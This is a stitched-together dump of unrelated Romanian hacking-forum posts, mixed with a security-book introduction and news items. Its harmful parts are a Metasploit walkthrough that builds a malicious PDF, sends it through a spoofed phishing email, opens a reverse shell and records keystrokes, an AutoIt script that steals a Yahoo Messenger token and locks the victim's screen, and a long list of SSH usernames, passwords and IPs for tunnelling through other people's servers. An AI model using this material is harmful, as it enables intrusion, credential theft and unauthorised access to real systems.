Leaderboard

SMS Bomber a devenit SMS Spammer si poate fi downloadat de aici: Link pagina 'oficiala': SMS Spammer Teoretic ar trebui sa mearga pe toate retelele din RO

Stiu ca multi dintre voi , folositi Mozila Firefox . Acesta este un tutorial pentru a va putea mari viteaza la Mozila FireFox : 1. Tasteaza in adress bar "about:config " apoi enter . 2. Selecteaza "network.http.pipelining" si da dublu click pe el vei vedea ca au loc niste schimbari si anume va aparea o variabila "true" . 3. Selecteaza "network.http.proxy.pipelining" si da da dublu click pe el vei vedea ca au loc niste schimbari si anume va aparea o variabila "true" . 4. Selecteaza "network.http.pipelining.maxrequests" si da click dreapta , New - Integer si adauga o variabila de preferat 0 , dar poti alege ce variabila doresti . Aceasta variabila si anume 0 are rolul de a forta browserul de a avea un timp de raspuns cat mai rapid Sursa : Hackertools

Pentru a demonstra puterea si modul MSF cum pot fi folosite in "client side" atac voi folosi o poveste.În lumea de securitate, de inginerie social? a devenit un vector de atac ce în ce mai utilizate. Chiar dac? tehnologiile se schimb?, un lucru care pare s? r?mân? acela?i lucru este lipsa de "securitate cu oamenii". Datorit? faptului c?,inginerie social? a devenit un foarte "fierbinte" subiect în lumea securitati. În scenariul nostru primul lucru care a fost de a culege o multime de informa?ii folosind instrumente, cum ar fi in cadru Metasploit, Maltego ?i alte instrumente pentru a aduna adrese de e-mail si informatii pentru a lansa un atac client side pe victima. Dup? o scufundare in tomberonul informatiilor ?i cautari dupa email-uri de pe web, am gasit dou? informa?ii importante despre tinta. 1) Ei folosesc "Best Computers" pentru servicii tehnice. 2) Departamentul IT are o adres? de e-mail a itdept@victim.com Dorim s? uplodam shell pe calculatorul departamentului IT ?i executa un key-logger pentru a ob?ine parole, Intel sau orice alte informatii. Vom începe prin înc?rcarea msfconsole nostru. Dupa ce le-am sunt înc?rcate, cream un fisier PDF malitios care ne ofera o portita in securitate tintei. Pentru a face acest lucru, trebuie s? apar? legitim, au un titlu care este realist, si sa nu fie semnalizat de anti-virus sau alt software de alert? de securitate. Vom utiliza Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability. Adobe Reader este predispus la un stack-based buffer overflow vulnerabilitate, deoarece-cererea nu reu?e?te s? efectueze controale adecvate de frontier? de pe ghidul de-a furnizat datele. Un atacator poate exploata aceast? problem? pentru a executa cod arbitrar cu privilegiile utilizatorului care ruleaz? aplica?ia sau accident cererii, negând serviciu pentru utilizatorii legitim. Deci, vom începe prin crearea nostru de fisier malware PDF pentru a fi utilizate în acest atac "client -side". msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf FILENAME => BestComputers-UpgradeInstructions.pdf msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128 LHOST => 192.168.8.128 msf exploit(adobe_utilprintf) > set LPORT 4455 LPORT => 4455 msf exploit(adobe_utilprintf) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME BestComputers-UpgradeInstructions.pdf yes The file name. OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The location of the file. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.8.128 yes The local address LPORT 4455 yes The local port Exploit target: Id Name -- ---- 0 Adobe Reader v8.1.2 (Windows XP SP3 English) Dup? ce vom seta toate op?iunile stabilite modul în care dorim, vom rula "exploit" pentru a crea fisierul malitios. msf exploit(adobe_utilprintf) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Creating 'BestComputers-UpgradeInstructions.pdf' file... [*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_utilprintf) > Deci, putem vedea c? fisierul nostru în format PDF a fost creat într-un sub-director de unde suntem. Deci, haide?i s? copiam in directorul nostru / tmp deci este mai u?or de a localiza mai târziu în exploit nostru. Înainte de a ne trimite fisier malware pentru victima noastr? avem nevoie pentru a configura un ascult?tor pentru a captura aceast? conexiune invers?. Vom folosi msfconsole s? înfiin?eze ascult?torul nostru pentru manipulare. msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 4455 LPORT => 4455 msf exploit(handler) > set LHOST 192.168.8.128 LHOST => 192.168.8.128 msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... Acum, c? ascult?torul nostru este în a?teptare pentru a primi sarcina sa util?, r?u inten?ionat trebuie numai s? le livram la victima ?i deoarece în culegerea de informa?ii noastr? am ob?inut adresa de e-mail a departamentului de IT, vom folosi un script la îndemân? mic numit sendEmail pentru a oferi aceast? sarcin? util? pentru a victim?. Cu un kung-fu-o linie, se poate ata?a PDF malitios, utilizam orice server SMTP dorim ?i s? scriem un e-mail destul de conving?toare de la orice adres? vrem .... root@bt:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf Reading message body from STDIN because the '-m' option was not used. If you are manually typing in a message: - First line must be received within 60 seconds. - End manual input with a CTRL-D on its own line. IT Dept, We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems. Sincerely, Best Computers Tech Support Aug 24 17:32:51 bt sendEmail[13144]: Message input complete. Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully! Dup? cum putem vedea aici, script-ul ne permite s? afi?ezi orice DIN (-f), adresa de orice TO (-t), orice SMTP (-e) serverul, precum ?i titlurile (-u) ?i ata?amentul nostru malware (-a ). Odat? ce vom face tot ceea ce vrem, apasam enter putem scrie orice mesaj ne-o dorim, apoi ap?sam CTRL + D ?i acest lucru va trimite e-mail pentru a victimei. Acum pe masina victimei, IT angajat al Departamentul de Securitate este obtinerea softwarelor la zi el verifica e-mail lui. El vede ca este un document foarte important isi copiaz? pe desktop-ul lui (ca el face întotdeauna) astfel încât el poate scana acest lucru cu program anti-virus. Dup? cum putem vedea, acesta a trecut cu brio si VICTIMA noastra este dispus s? deschid? acest fi?ier pentru a pune în aplicare rapida acest upgrade-uri foarte importante. F?când clic pe fi?ierul se deschide Adobe, dar prezinta o fereastr? în gri, care nu dezv?luie un PDF. În schimb, conexiunea inversa se executa pe masina victimei. [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Sending stage (718336 bytes) session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322) meterpreter > Avem acum o coaj? de pe computerul lor printr-un atac r?u inten?ionat PDF client side attack. Desigur, ceea ce ar fi în?elept în acest moment este de a muta coaj? (shell) într-un proces diferit, asa ca atunci cand ei se ucid Adobe nu ne pierdem shellul nostru. Apoi vom ob?ine informa?ii de sistem, începem un key-logger ?i de a continua exploatarea re?elei. meterpreter > ps Process list ============ PID Name Path --- ---- ---- 852 taskeng.exe C:\Windows\system32\taskeng.exe 1308 Dwm.exe C:\Windows\system32\Dwm.exe 1520 explorer.exe C:\Windows\explorer.exe 2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe 3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe 3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter > sysinfo Computer: OFFSEC-PC OS : Windows Vista (Build 6000, ). meterpreter > use priv Loading extension priv...success. meterpreter > run post/windows/capture/keylog_recorder [*] Executing module against V-MAC-XP [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt [*] Recording keystrokes... root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt Keystroke log started at Wed Mar 23 09:18:36 -0600 2011 Support, I tried to open ti his file 2-3 times with no success. I even had my admin and CFO tru y it, but no one can get it to p open. I turned on the rmote access server so you can log in to fix our p this problem. Our user name is admin and password for that session is 123456. Call or eme ail when you are done. Thanks IT Dept Tradus de mine de la Sursa : Client Side Attacks - Metasploit Unleashed Inspirat din tutorialul de mai sus am folosit atacul la https://rstcenter.com/forum/55239-unkn0wn-www-fsconsult.rst

The Seven Deadliest Attacks Series Seven Deadliest Network Attacks Mike Borkin Rob Kraus Stacy Prowell Introduction: Security is heavily contextual; the effectiveness of any security measures depends on the context into which they are deployed. What if you give keys to the janitor, and he or she leaves them in his or her unlocked car? Further security is often not incremen- tal ; insecurity in one area can lead to insecurity in all areas. Hackers might break into your machines and steal your proposals and bidding information, so you carefully secure your network. Hackers might break into employees’ home networks to steal passwords, e-mail accounts, or even hijack “secure” connections to break into your corporate network, so you institute policies about remote access. Hackers might park outside your building and “listen in” on your wireless network, so you encrypt it and use special measures to prevent the wireless signal from leaking outside the building. Hackers might use e-mail “phishing” and other “social engineering” attacks to gain access, so you add more policies and carefully train your staff and test them from time to time. Finally, comfortably secure and ready for anything, you unknowingly hire the hackers and fall victim to an “insider” attack. Life’s tough. What we think of as security is really a collection of policies and procedures that are, ultimately, about giving out information. Your employees (or even other parts of your infrastructure) need information to accomplish their mission. Security stands between your employees and accomplishing that mission. All too often serious secu- rity breaches start with some otherwise well-intentioned effort to get some useful work done. Sometimes, it is your employees who break your security; not necessarily because they have some evil purpose, but sometimes because they believe the mission is more important or that the security measures are unnecessary. The mission may be short term and absolutely critical. The effects of a security breach can take years to evolve or even to be detected. It is late in the day and you have a very important bet-your-company deliverable due out in the morning. You desperately need Software X to run in order to finish the Introduction xii deliverable, but Software X is being blocked by your firewall. You’ve tried adding rules to the firewall, you’ve tried calling the vendor, but nothing is working. Finally you disable the firewall, finish the deliverable, and ship. Will you remember to re-enable the firewall? Did you monitor your network while the firewall was down? The view that security is a collection of tradeoffs, or a series of calculated risks, assumes a continuous nature to security. The belief that you can trade a little insecu- rity for some other gain is often a misunderstanding of the nature of security. This is akin to saying you will allow anyone to withdraw money from your bank account but only as much as they can withdraw in 10 minutes. The mistake is that the two things (in this case money and time) are not directly related. how thIs Book Is organIzed This book identifies seven classes of network attacks and discusses how the attack works, including tools to accomplish the attack, what are the risks of the attack, and how to defend against the attack. Seven attacks were chosen: denial of service, war dialing, penetration testing, protocol tunneling, spanning tree attacks, man-in-the- middle, and password replay. These are not mutually exclusive; you can exploit the spanning tree protocol, for example, to launch a denial-of-service attack. These were chosen because they help illustrate different aspects of network security; the principles on which they rely are unlikely to vanish any time soon, and they allow for the possi- bility of gaining something of interest to the attacker, from money to high-value data. Chapter 1, “Denial of Service,” illustrates how even sophisticated networks can be crippled by a determined hacker with relatively few resources. Chapter 2, “War Dialing,” illustrates how a hacker can circumvent the hardened security perimeter of a network to access “softer” targets. Chapter 3, “Penetration ‘Testing,’” discusses the various tools and techniques used for penetration testing that are readily available to both the defenders and the attackers. Chapter 4, “Protocol Tunneling,” presents a method for deliberately subverting your network perimeter to “tunnel” prohibited traffic into and out of your network. Chapter 5, “Spanning Tree Attacks,” discusses the “layer 2” network responsible for knitting together your switches, routers, and other devices into a reliable net- work, and illustrates one way in which to exploit the weak security of this layer. Chapter 6, “Man-in-the-Middle,” discusses a very common attack pattern and just what an attacker can accomplish once he or she has inserted himself or herself into your data stream. Chapter 7, “Password Replay,” focuses on the security of passwords and other static security measures and how an attacker can use various techniques to gain unauthorized access. Introduction xiii This book is intended to provide practical, usable information. However, the world of network security is evolving very rapidly, and the attack that works today may (hopefully) not work tomorrow. It is more important, then, to understand the principles on which the attacks and exploits are based in order to properly plan either a network attack or a network defense. The authors chose the contents of this book because we believe that, underlying the attacks presented here, there are important principles of network security. The attacks are deadly because they exploit princi- ples, assumptions, and practices that are true today and that we believe are likely to remain true for the foreseeable future. Increasingly sophisticated criminal organizations launch network attacks as a seri- ous, for-profit enterprise. Similarly, well-funded governmental actors launch network attacks for political reasons or for intelligence gathering. Cyberspace is already a battlefield. Even if your network doesn’t have high-value intelligence and you don’t have deep pockets, you may be the target of a sophisticated attack because you have something else of value: machines and network access. An attacker may exploit your network to launch malware or to launch a network attack. Your Internet Protocol address may serve to give the attacker a level of plausible deniability. After all, would you want to launch the virus you just finished creating through your own Internet ser- vice provider connection? Attackers may use your machines for storage of informa- tion ranging from child pornography to stolen credit card numbers. Once these show up on your machines, it becomes your job to explain how they got there. Attackers can use compromised machines for command and control of deployed and distributed malware. This can result in your network being blacklisted or blocked as a distribu- tion source for malware. Is this the company image you want your customers to see? As networks grow and incorporate more sophisticated technologies, it can become difficult to maintain the necessary situational awareness. What were once “dumb” network nodes such as printers and network hardware may now have exploitable – and unexpected – vulnerabilities. These components are – in reality – just other computers on the network. Some of them have multiple interfaces that need to be considered, including Bluetooth, wireless, and wired connections. If one interface is well protected and another disabled, there may still be a third that is available. Network security requires considering the role and security concerns of each device, not just delivering the device and plugging it in. There are many reasons why network security is hard, ranging from the fact that networks are increasingly sophisticated and complex to the fact that economic incen- tives can work against proper security. Network security is essentially asymmetric warfare ; your adversaries can probe anywhere, but you have to defend everywhere. This creates a technological bias in favor of the attackers. Further, criminal organiza- tions live in a target-rich environment. If they are unsuccessful with one attack, they can move on and attack a different organization. The market for computer security products can – and does – fall prey to the asym- metric information problem. This is a case in which buyers of a product do not have as much information about the relative merits of the product as the sellers do. This creates a downward pressure on prices that, in turn, creates a downward pressure on quality. Introduction xiv Consider a used car market in which there are 100 good cars (the “plums”), worth $3000 each, and 100 rather troublesome ones (the “lemons”), each of which is worth only $1000. The vendors know which is which, but the buyers don’t. So what will be the equilibrium price of used cars? If customers start off believing that the probability that they will get a plum is equal to the probability that they will get a lemon, then the market price will start off at $2000. However, at that price only lemons will be offered for sale, and once the buyers observe this, the price will drop rapidly to $1000 with no plums being sold at all.1 ConCLusIon Network security depends on many factors, and perfect network security is impossible. Network protocols can be inherently insecure in surprising ways. Cryptographic func- tions that are essential to network security can fall prey to sophisticated mathematical attacks. The algorithms that implement protocols or cryptography can contain bugs. Even otherwise correct code can fall prey to the effects of being run on a computer; errors exist in chip designs, and the use of finite-precision math on computers can result in unexpected effects that can be exploited. This is all good news for attackers—but not so much for defenders. Of course, all is not lost. As a network administrator, you may have other factors on your side, including support by law enforcement, governmental agencies, and trusted third parties such as CERTA and SANS.B You have to control what you can. Stay educated on threats and responses. Make sure procedures support good security, and that personnel are properly trained. Make plans to deal with attacks. Most impor- tantly, you need to understand how and why network attacks work. It is our hope that this book will contribute to that goal. endnote 1. Anderson R. Why information security is hard – an economic perspective. Proceedings of the 17th Annual Computer Security Applications Conference (ACSAC); 2001 Dec. A See www.cert.org/ B See www.sans.org/ Download

Foarte bine ai facut oricum eu il aveam deja

15% au trecut de securitatea din Windows 8 Bitdefender confirma, printr-un raport asupra Windows 8 ca securitatea sistemului de operare este discutabila, chiar si cu Windows Defender activat. Compania a desfasurat o serie de teste comparative in care a rulat virusi pe noul sistem de operare de la Microsoft – Windows 8, dar si pe precedenta versiune – Windows 7. Rezultatele testarii au atatat ca dintr-un set de 385 de aplicatii periculoase, din cele mai populare familii detectate in ultimele 6 luni, 61 de virusi au fost capabili sa infecteze un computer ce rula Windows 8, cu aplicatia de securitate Windows Defender activata. 322 de virusi au fost stersi de Windows Defender, iar alti doi, care au trecut de antivirus, au esuat sa se execute deoarece au fost blocati de User Account Control (UAC) – sistem de securitate a contului. La testele comparative derulate pe Windows 7 si Windows 8, cu antivirusul integrat dezactivat, nu s-au inregistrat diferente notabile. Dintre cei 385 de virusi, 234 au fost rulati cu succes si au continuat sa desfasoare unul sau mai multe procese, pana la curatarea calculatorului. BUCURESTI, 08 noiembrie 2012 – Bitdefender, liderul pietei locale de antivirus, a desfasurat o serie de teste comparative in care a rulat virusi pe noul sistem de operare de la Microsoft – Windows 8, dar si pe precedenta versiune – Windows 7. Rezultatele testarii au atatat ca dintr-un set de 385 de aplicatii periculoase, din cele mai populare familii detectate in ultimele 6 luni, 61 de virusi au fost capabili sa infecteze un computer ce rula Windows 8, cu aplicatia de securitate Windows Defender activata. 322 de virusi au fost stersi de Windows Defender, iar alti doi, care au trecut de antivirus, au esuat sa se execute deoarece au fost blocati de User Account Control (UAC) – sistem de securitate a contului. ’’Desi noua versiune a sistemului de operare de la Microsoft aduce unele imbunatatiri in materie de securitate, exista totusi o pondere consistenta de amenintari care au trecut de masurile de protectie integrate. Pentru un grad de siguranta foarte inalt, recomandam un program antivirus performant, compatibil cu Windows 8’’, a declarat Catalin Cosoi, Chief Security Strategist, Bitdefender. La testele comparative derulate pe Windows 7 si Windows 8, cu antivirusul integrat dezactivat, nu s-au inregistrat diferente notabile. Dintre cei 385 de virusi, 234 au fost rulati cu succes si au continuat sa desfasoare unul sau mai multe procese, pana la curatarea calculatorului. In aceeasi testare, 138 de aplicatii periculoase nu au putut fi pornite de calculator din motive diverse, iar 6 amenintari au fost executate, dar au esuat inainte de a opera vreo schimbare pe PC. Sapte amenintari au fost lansate, dar continutul periculos a fost blocat de UAC. ’’Am ales sa testam sistemul cu si fara antivirusul integrat activ pentru a vedea pe de o parte care sunt imbunatatirile aduse sistemului de operare Windows 8 in sine si, pe de alta parte, care este nivelul de protectie «cu toate scuturile sus», adica si cu Windows Defender activat’’, a declarat Bogdan Botezatu, Senior e-Threat Analyst, Bitdefender. Metodologia de testare Pasul 1: Pentru a realiza testul s-au folosit doua computere identice care rulau configuratii de Windows 7 si Windows 8 pornite de pe un server din retea. Pasul 2: Dupa rularea unei aplicatii periculoase si dupa ce s-a stabilit daca computer-ul a fost compromis sau nu, sistemul este curatat si testul se reia. Presupunem ca virusul a infectat PC-ul atunci cand initiaza propriul proces, pe care il mentine in memorie pana la curatare. Pasul 3: – Testarea pe Windows 7, Windows 8 si Windows 8 cu Windows Defender: Testul de malware pe Windows 8 a fost derulat in doua etape dupa cum urmeaza: a) Pentru a ne asigura ca si Windows 7, si Windows 8 sunt pe picior de egalitate, am dezactivat solutia antivirus care se livreaza implicit cu Windows 8. Al doilea test este un scenariu real-life cu Windows 7 versus Windows 8 plus Windows Defender. Pasul 4: Setul de aplicatii continand software periculos a cuprins 385 de virusi dintre cele mai populare 100 de familii intalnite in ultimele 6 luni, potrivit sistemului Bitdefender de raportare in timp real a virusilor. Continutul periculos a fost gazduit pe un FTP intern si copiat pe computer dupa curatarea prealabila. Pasul 5: Dupa rularea virusilor pe sistemul selectat se emite un raport detaliat cu diferentele dintre sistemul original si cel infectat. Toate aplicatiile periculoase au fost rulate pe un sistem de operare Windows cu UAC pornit si setat implicit. Daca una dintre operatiunile aplicatiei periculoase genereaza notificari UAC, se considera ca aplicatia nu si-a indeplinit scopul si computerul nu a fost afectat. In aceeasi testare, 138 de aplicatii periculoase nu au putut fi pornite de calculator din motive diverse, iar 6 amenintari au fost executate, dar au esuat inainte de a opera vreo schimbare pe PC. Sapte amenintari au fost lansate, dar continutul periculos a fost blocat de UAC. Microsoft doreste imbunatatirea C++ si de adaugare a mai mult suport Unul dintre cele mai folosite limbaje de programare din lume, C++, revine in atentia Microsoft care promite ca instrumentul va fi imbunatatit, va primi update-uri regulate si toata atentia pentru a (re)deveni un “limbaj de programare modern”. Toate aceste promisiuni au fost facute in acest weekend, in cadrul conferintei dezvoltatorilor care are loc In Redmond. Principala promisune, de fapt, este ca Microsoft va imbunatati compilerul care este si parte din cunoscuta suita de instrumente de dezvoltare Visual Studio. Este deja cunoscut faptul ca C++ a devenit putin desuet, in comparatie cu alte limbaje de programare, insa nu trebuie omis ca cele mai importante sisteme de infrastructura au la baza C++. Din ce a reiesit de la BUILD (conferinta dezvoltatorilor) se pare ca dezvoltatorii vor avea destule motive pentru a-si recapa apetenta pentru utilziarea tool-ului. Standardele vor fi updatate mai des, cu un nou release major programat pentru 2017, dar si cu un release mai restrans programat pentru 2014. Cum vrea Microsoft sa dezvolte C++? Prin crearea unor subgrupe de devoltatori, care vor lucra in paralel pe diferite module (file sistem acces sau networking, de exemplu) si vor programa dupa propriile specificatii, alaturi de standardul instrumentului pentru a extinde flexibilitate C++ intr-un final. Iar stirile nu se opresc aici. Microsoft, Intel, Google IBM si multe alte nume mari din industrie au format un grup de lucru, Standard C++ Foundation, care va promova si va consilia utilizarea si dezvoltarea noului C++. Din pacate insa, deocamdata nu avem mai multe informatii referitoare la toate componentele Viasual Studio. Asa ca programatorii vor beneficia de un update al compilerului, insa librariile si IDE-ul (mediul integrat de dezvoltare) raman neschimbate momentan. Microsoft nu a precizat cand va fi lansata versiunea finala si completa (cu librarii si IDE), dar se pare ca prima jumatate a anului viitor este un orizont de timp rezonabil pentru publicare. Sursa: Life4Gadgets | Comunitatea pasionatilor de gadgeturi [baietii de acolo probabil au pus datele de contact pentru a nu lasa blank page.]

Cand victima tasteaza cuvantul /bine/ veti primi ets-ul ei si se apeleaza functia funny... facut de plictiseala , il puteti modifica de exemplu cand scrie un anumit cuvant sa faca nush ce...plm, end of story Ps/ functia funny e de pe net. Autoit While 1 If WinExists("[CLASS:CTabbedIMHost]") Then $Text = ControlGetText("[CLASS:CTabbedIMHost]", "", "YIMInputWindow1") $Word = "bine" $String = StringCompare($Text, $Word) If $String = 0 Then ControlSend("[CLASS:CTabbedIMHost]", "", "[CLASS:YIMInputWindow; INSTANCE:1]", " coi {ENTER}") $ETS = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "ETS") WinSetTrans("[CLASS:CTabbedIMHost]", "", 0) ControlSend("[CLASS:CTabbedIMHost]", "", "[CLASS:YIMInputWindow; INSTANCE:1]", $ETS & "{ENTER}") WinSetTrans("[CLASS:CTabbedIMHost]", "", 255) ControlSend("[CLASS:CTabbedIMHost]", "", "[CLASS:YIMInputWindow; INSTANCE:1]", "<DING>{ENTER}") _Funny () EndIf EndIf Sleep(100) WEnd Func _Funny () While True WinMinimizeAll() WinSetState("[CLASS:DV2ControlHost]", "", @SW_DISABLE) WinSetTrans("[CLASS:DV2ControlHost]", "", 0) WinSetState("[CLASS:Shell_TrayWnd]", "", @SW_HIDE) WinSetState("Program Manager", "", @SW_HIDE) HotKeySet("{ESC}", "_escape") Global $x Global $y Global $c Global $o $gui = GUICreate("HACKED", @DesktopWidth + 3, @DesktopHeight + 3, -1, -1) GUISetState(@SW_SHOW) WinSetTrans("HACKED", "", 99) While 1 $x = Random(150, @DesktopWidth, 1) $y = Random(150, @DesktopHeight, 1) $c = Random(000000, 999999, 1) $o = Random(75, 99, 1) MouseMove($x, $y, 5) ToolTip("HACKED") GUISetBkColor($c, $gui) Sleep(5) WEnd WEnd EndFunc Func _escape() GUISetState(@SW_HIDE, "Cover") WinSetState("Program Manager", "", @SW_SHOW) WinSetState("Program Manager", "", @SW_SHOW) WinSetState("[CLASS:Shell_TrayWnd]", "", @SW_SHOW) WinSetState("[CLASS:DV2ControlHost]", "", @SW_ENABLE) WinSetTrans("[CLASS:DV2ControlHost]", "", 255) Exit EndFunc

Am decis s? creez o imagine Virtual Box pentru a veni în ajutorul pentesterilor, celor pasiona?i de analiza & detec?ia viru?ilor ?i nu numai. O scurt? descriere : O imagine Virtual Box este o versiune virtual? a unui sistem de operare, un emulator. Versiunea v0.1 alfa (actuala) con?ine Windows XP SP3, îmbun?t??it cu minimul necesar de programe ?i tweak-uit pentru o securitate optim?, al?turi de o stabilitate ridicat? a sistemului de operare. Consumul de RAM este minim pentru o performan?? ridicat?. Dup? cum am precizat mai sus, aceasta este prima versiune, înc? în stadiul de testare. Pe m?sur? ce va evolua proiectul, vom oferi o gam? variat? de versiuni, optimizate pentru diverse domenii : programare, pentesting, recovery, malware analysis etc. Mai multe detalii al?turi de o prezentare video pute?i g?si pe blogul meu : a2480f25: Windows XP SP3 RSTCore Edition v0.1 Cine dore?te prima versiune, s?-mi trimit? pm ?i va primi un fi?ier torrent. UPDATE 2012 : http://docs.rtfm.us/Users/begood/rstcore/ http://filecloud.io/yezs78ga http://filecloud.io/jw73a049 http://filecloud.io/mb8tox26 http://filecloud.io/s28zuykd http://filecloud.io/n8vx7c31 http://filecloud.io/6m0qrdk5 http://filecloud.io/24ydtjkh

Tutorial Nologin Ce este un nologin? Este acel root care nu te lasa sa te loghezi, cand incerci sa te conectezi te da afara cu alte cuvinte! de exemplu un cont de mail userul are drept sa citeasca mailurile dar nu sa stocheze sau sa modifice informatii, acesta se poate numi nologin. ok deci avem nevoie de un nologin si un tool de conectare nu ? asta ar fi si logic! nologinul :vicky:vicky:69.7.204.212 user : pass : ip Avem nevoie de tool-ul : Bitvise Tunnelier (SSH Client) http://www.bitvise.com/tunnelier Toolul necesita instalare ! asta cred ca stiti si singur sa o face-ti acum haideti sa ii facem mica configurare pentru nologinul nostru: Mergem la Services-->SOKS/HTTP Proxy Forwarding si bifam Enabled completam la port cu portul 1080 Apoi Mergem La Login : La Host punem ip-ul nologinului : 69.7.204.212 la username : userul:vicky La Initial Mhetod selectati password iar acum la password e logic ca vom pune parola nologinului : vicky Apoi Click pe Login O sa apara sa dati Accept intro noua fereastra : gata cu betvise acum urmeaza sa il punem in browser. Ok Sa facem setarile in Mozila : Tools -->Advanced-->Network-->Settings...-->Bifam : Manual Proxy Configuration : si la SOKS Host : scriem 'localhost' iar la port punem portul setat in betvise adica 1080 -> apoi clik pe OK. si acum sa vedem ip-ul in browserul mozila: www.whatismyip.com Daca doriti sa folositi un root nu un nologin este exact la fel aceasi setari aboslut totul este identic insa inaite de a esi din root sa nu uitati sa sterge-ti istoricul . ------------- credits: r3v ______________________________ Nologinuri lee:lee:116.212.201.27 guest:guest:220.233.240.220 spam:spam:220.233.7.130 test:test:210.84.36.170 dannyanny:150.101.113.76 webmaster:123456:150.101.17.187 matt:matt:150.101.156.234 guest:guest:59.167.212.14 guest:guest:59.167.214.95 guest:guest:59.167.247.207 admin:admin:220.233.11.138 spam:spam:220.233.7.130 sharon:sharon:209.173.221.70 student:student:188.120.239.51 student:student:188.120.239.47 student:student:188.120.239.52 student:student:188.120.239.78 student:student:188.120.239.82 student:student:188.120.239.41 student:student:188.120.239.44 student:student:188.120.239.50 student:student:188.120.239.48 student:student:188.120.239.77 student:student:188.120.239.81 student:student:188.120.239.45 student:student:188.120.239.80 student:student:188.120.246.83 student:student:188.120.246.73 student:student:188.120.246.79 anonymous:anonymous:188.120.224.24 anonymous:anonymous:188.120.224.49 anonymous:anonymous:188.120.224.51 anonymous:anonymous:188.120.224.54 anonymous:anonymous:188.120.224.57 anonymous:anonymous:188.120.224.65 anonymous:anonymous:188.120.224.68 anonymous:anonymous:188.120.224.78 anonymous:anonymous:188.120.224.82: anonymous:anonymous:188.120.224.96 anonymous:anonymous:188.120.224.87 anonymous:anonymous:188.120.224.62 anonymous:anonymous:188.120.224.70 anonymous:anonymous:188.120.224.85 anonymous:anonymous:188.120.224.88 anonymous:anonymous:188.120.224.93 anonymous:anonymous:188.120.224.101 anonymous:anonymous:188.120.224.103 anonymous:anonymous:188.120.224.106 anonymous:anonymous:188.120.224.111 anonymous:anonymous:188.120.224.113 anonymous:anonymous:188.120.224.48 anonymous:anonymous:188.120.224.35 anonymous:anonymous:188.120.224.44 anonymous:anonymous:188.120.224.53 anonymous:anonymous:188.120.224.56 anonymous:anonymous:188.120.224.61 anonymous:anonymous:188.120.224.83 anonymous:anonymous:188.120.224.69 anonymous:anonymous:188.120.224.58 anonymous:anonymous:188.120.224.72 anonymous:anonymous:188.120.224.77 anonymous:anonymous:188.120.224.84 anonymous:anonymous:188.120.224.107 anonymous:anonymous:188.120.224.98 anonymous:anonymous:188.120.224.97 anonymous:anonymous:188.120.224.100 anonymous:anonymous:188.120.224.81 anonymous:anonymous:188.120.224.52 anonymous:anonymous:188.120.224.29 anonymous:anonymous:188.120.224.60 anonymous:anonymous:188.120.224.59 anonymous:anonymous:188.120.224.67 anonymous:anonymous:188.120.224.75office:office:165.228.126.90 ______ #Sursa de la nologinuri aici. ________________________ Tunnelier & Proxyfier 1. Deschideti tunelierul, duceti-va la Serice si unde scrie SOCKS / HTTP Proxy forewarding, bifati Enabled. Acum va puteti loga pe no-login. 2. Deschideti Proxifire, si adaugati urmatoarele: IP: 127.0.0.1 Port: 1080 Deschideti programele in urmatorea ordine. Tunnelier ( va logati ) iar dupa deschideti Proxifier. #thanks to darkston3e